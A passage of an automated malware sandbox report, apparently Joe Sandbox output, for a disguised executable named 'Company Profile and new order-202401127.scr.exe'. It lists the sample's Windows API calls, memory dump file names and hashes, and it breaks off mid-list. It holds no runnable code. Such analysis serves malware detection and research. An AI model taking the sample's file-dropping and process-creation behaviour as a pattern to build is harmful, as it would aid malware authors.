                                                                                            • Instruction Fuzzy Hash: 5721F673904214EBDB30AFA8DE85A5F72B4AB08324714053FF642B32C4C6B8DC418B9D
                                                                                            APIs
                                                                                              • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(75923420,00425F58,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                              • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                            • lstrlenW.KERNEL32 ref: 00402344
                                                                                            • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                            • String ID:
                                                                                            • API String ID: 1486964399-0
                                                                                            • Opcode ID: adf239f7f9eb47ee802845b618c645dbf4ee4f3d223853d8a4e14c953ff1d079
                                                                                            • Instruction ID: e570f7e88bbeadde5f19d209a5805755c0aba3de4ac721a8bb04e236ab5037c1
                                                                                            • Opcode Fuzzy Hash: adf239f7f9eb47ee802845b618c645dbf4ee4f3d223853d8a4e14c953ff1d079
                                                                                            • Instruction Fuzzy Hash: 93117071D00318AADB10EFF9DD09A9EB6B8AF14308F10443FA401FB2D1D6BCC9418B59
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                            • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                                            • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                            • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 00405689
                                                                                              • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 004056D5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeMessageSendUninitialize
                                                                                            • String ID:
                                                                                            • API String ID: 2896919175-0
                                                                                            • Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                                            • Instruction ID: 475fcf9b7f10ddbfaf371a97523a1b3de976bd413908d41e9885f35b47f6a1cd
                                                                                            • Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
                                                                                            • Instruction Fuzzy Hash: 34F09A776007409BEA215795AE06B6777B4EB94304F85483AEF8CA26F1CB7A4C028B5D
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                            • GetLastError.KERNEL32 ref: 00405AC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                            • Instruction ID: 25953aab165e2e3bb2b5eb59dc1d6ee29197e23c9d0e5a802ce790cbbbfebc39
                                                                                            • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                            • Instruction Fuzzy Hash: 33F0F4B1D1060EDADB00DFA4C6497EFBBB4AB04309F04812AD941B6281D7B982488FA9
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?, ",?), ref: 00405B2D
                                                                                            • CloseHandle.KERNEL32(?,?,?, ",?), ref: 00405B3A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID:
                                                                                            • API String ID: 3712363035-0
                                                                                            • Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                                            • Instruction ID: ee07c3f2d7011aacc779afc4df031ab31c5939bdda65a61cc684f2ad200dc2b8
                                                                                            • Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
                                                                                            • Instruction Fuzzy Hash: 7FE0BFB4610219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551E774A9148A78
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1268545403-0
                                                                                            • Opcode ID: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                                            • Instruction ID: add67a47d66b636189698deb609c527a6af1c8d9f2ae6a081c6d5e40f6b59c33
                                                                                            • Opcode Fuzzy Hash: cab2a2c0edfac892ff3ce5f7d86d0a7ecd7f2e6ddf1a0654be13e65ecb3d048e
                                                                                            • Instruction Fuzzy Hash: 30E04F72B11214ABCB15DBA8EDD086E73B6EB48320350443FD102B3690CB759C458B58
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                              • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                              • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                                                                              • Part of subcall function 004068A5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2547128583-0
                                                                                            • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                            • Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
                                                                                            • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                            • Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe,80000000,00000003), ref: 00406015
                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                            • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                            • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                            • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405BF1,?,?,00000000,00405DC7,?,?,?,?), ref: 00405FF1
                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406005
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                            • Instruction ID: 701c1f243114c6c95f20a1fe0a395a260d282ed21d39929bf23a1ad3933a3a4e
                                                                                            • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                            • Instruction Fuzzy Hash: E9D0C972504220AFD2102728AE0889BBB55DB54271B028A35F8A9A22B0CB314C668694
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                            • Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
                                                                                            • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                            • Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
                                                                                            APIs
                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringWrite
                                                                                            • String ID:
                                                                                            • API String ID: 390214022-0
                                                                                            • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                            • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                                                            • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                                            • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                                                            APIs
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
